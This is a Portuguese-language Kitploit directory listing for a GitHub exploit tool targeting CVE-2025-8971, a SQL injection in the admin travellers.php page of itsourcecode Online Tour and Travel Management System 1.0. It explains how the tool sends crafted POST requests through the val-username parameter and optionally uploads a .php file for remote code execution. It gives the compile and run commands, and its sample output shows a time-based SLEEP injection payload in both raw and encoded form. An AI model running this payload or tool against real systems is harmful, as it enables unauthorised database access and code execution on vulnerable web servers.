Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/bytereaper77/cve-2025-8971
Geração de PayloadsAnálise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoArchived
GitHubbytereaper77/cve-2025-8971

CVE-2025-8971

Injeção SQL no itsourcecode Online Tour and Travel Management System 1.0.

Ver Repositório
12há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-8971 (Injeção SQL)

Autor: Byte Reaper

Descrição :

Este exploit para CVE-2025-8971, uma vulnerabilidade de injeção SQL no itsourcecode Online Tour and Travel Management System 1.0. A vulnerabilidade existe em /admin/operations/travellers.php e pode ser explorada remotamente através do parâmetro val-username.

Como funciona

O exploit envia requisições HTTP POST manipuladas para a URL alvo.

Os payloads são codificados e injetados em val-username.

Upload opcional de arquivo (.php ou imagem) pode ser usado para alcançar execução remota de código.

O script verifica as respostas para checar se o payload foi executado com sucesso.

Requisitos :

root@kitploit:~
GCC compiler (gcc)

Linux x86_64 

ibcurl 

Compilação :

root@kitploit:~
    gcc script.c argparse.c -o CVE-2025-8971 -lcurl
    ./CVE-2025-8971 -u http://<target> -v [verbose mode]

Uso:

root@kitploit:~
    -h, --help            mensagem de ajuda
    -u, --url             URL Alvo (URL BASE)
    -c, --cookies         Arquivo de cookies
    -i, --ip              IP Falso (requisição do Host)
    -f, --file            Upload de arquivo (.php / imagem)
    -v, --verbose         Modo Verbose

Exemplo de Execução :

root@kitploit:~
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....

Licença :

MIT License

Baixar ferramenta